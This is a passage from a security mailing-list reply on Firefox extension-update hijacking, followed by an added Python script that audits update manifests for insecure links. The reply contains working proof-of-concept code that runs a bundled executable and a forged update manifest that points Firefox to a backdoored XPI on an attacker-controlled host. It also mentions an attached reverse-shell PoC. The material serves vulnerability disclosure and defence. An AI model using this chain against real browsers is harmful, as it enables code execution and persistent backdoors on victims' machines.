Very good and detailed advisory. I came up with the same issue about one month ago and developed two PoCs.
Here is the hash: http://ferruh.mavituna.com/makale/firefox-hash/ (shame on me that I haven't sent it to any public mailing list; if you are really curious, check out the RSS caches and the Google cache) and a brief explanation is in the attachment (Firefox-MITM.txt).
I attached the Google Toolbar PoC. Be careful, it throws a reverse shell. I also have a PoC for Linux.
To clarify things, you can execute arbitrary code with the current user's rights.
Here is some sample code:
--------------------
// Path of the binary shipped inside the XPI, resolved from the profile directory
exepath = Components.classes["@mozilla.org/file/directory_service;1"]
    .getService(Components.interfaces.nsIProperties)
    .get("ProfD", Components.interfaces.nsIFile).path
    + "\\extensions\\{3112ca9c-de6d-4884-a869-9855de68056c}\\chrome\\svchost.exe";
runFile(exepath);

function runFile(f) {
    // Wrap the path in an nsILocalFile
    var file = Components.classes["@mozilla.org/file/local;1"]
        .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(f);
    // nsIProcess launches it with the current user's rights
    var process = Components.classes["@mozilla.org/process/util;1"]
        .createInstance(Components.interfaces.nsIProcess);
    process.init(file);
    var args = [""];
    process.run(false, args, args.length);
}
--------------------
Sample update response XML:
----------
<?xml version="1.0"?>
<RDF:RDF xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}">
    <em:updates><RDF:Seq>
      <RDF:li resource="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16"/>
    </RDF:Seq></em:updates>
  </RDF:Description>
  <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16">
    <em:version>4.0.0.16</em:version>
    <em:targetApplication><RDF:Description>
      <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
      <em:minVersion>1.5.0</em:minVersion>
      <em:maxVersion>2.9.99</em:maxVersion>
      <em:updateLink>http://192.168.1.130/firefox/google.xpi</em:updateLink>
    </RDF:Description></em:targetApplication>
  </RDF:Description>
</RDF:RDF>
----------
This is our backdoored xpi file URL: http://192.168.1.130/firefox/google.xpi
I modified the google-toolbar.xul and added code to run the svchost.exe file, which is in the xpi file as well.
A sample xpi file is attached, a modified version of the Google Toolbar extension, and it will run every time you launch Firefox.
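As an added example (not code from the post above, nor from Mozilla), here is a small Python audit that parses an extension update manifest like the one shown and reports update entries whose XPI could be replaced in transit: an em:updateLink served over plain http with no em:updateHash next to it. The manifest embedded in the block is a constructed copy of the sample response.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RDF_NS = "{http://www.w3.org/1999/02/22-rdf-syntax-ns#}"   # ElementTree tag prefixes
EM_NS = "{http://www.mozilla.org/2004/em-rdf#}"

def find_insecure_update_links(manifest_xml):
    """Return (resource, updateLink, reason) for every update entry whose XPI could
    be swapped in transit: a non-https updateLink with no em:updateHash beside it."""
    root = ET.fromstring(manifest_xml)
    parent = {child: p for p in root.iter() for child in p}  # ET keeps no parent links
    findings = []
    for link_el in root.iter(EM_NS + "updateLink"):
        link = (link_el.text or "").strip()
        scheme = urlparse(link).scheme.lower()
        # em:updateHash, when present, is a sibling of em:updateLink in the same block
        hash_el = parent[link_el].find(EM_NS + "updateHash")
        if scheme == "https" or (hash_el is not None and (hash_el.text or "").strip()):
            continue
        # walk up to the nearest RDF:Description that names the resource; the sample
        # manifest on this page writes the attribute as a bare 'about'
        node, resource = link_el, "<unknown resource>"
        while node is not None:
            about = node.get(RDF_NS + "about") or node.get("about")
            if node.tag == RDF_NS + "Description" and about:
                resource = about.strip()
                break
            node = parent.get(node)
        findings.append((resource, link,
                         "updateLink uses %s without em:updateHash" % (scheme or "no scheme")))
    return findings

# Constructed copy of the update response shown in the post above.
SAMPLE_UPDATE_RDF = """<?xml version="1.0"?>
<RDF:RDF xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}">
    <em:updates><RDF:Seq><RDF:li
      resource="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16"/>
    </RDF:Seq></em:updates>
  </RDF:Description>
  <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16">
    <em:version>4.0.0.16</em:version>
    <em:targetApplication><RDF:Description>
      <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
      <em:minVersion>1.5.0</em:minVersion><em:maxVersion>2.9.99</em:maxVersion>
      <em:updateLink>http://192.168.1.130/firefox/google.xpi</em:updateLink>
    </RDF:Description></em:targetApplication>
  </RDF:Description>
</RDF:RDF>"""
```

Running it over the sample flags the single 4.0.0.16 entry; switching the link to https, or pinning an em:updateHash beside it, makes the manifest pass.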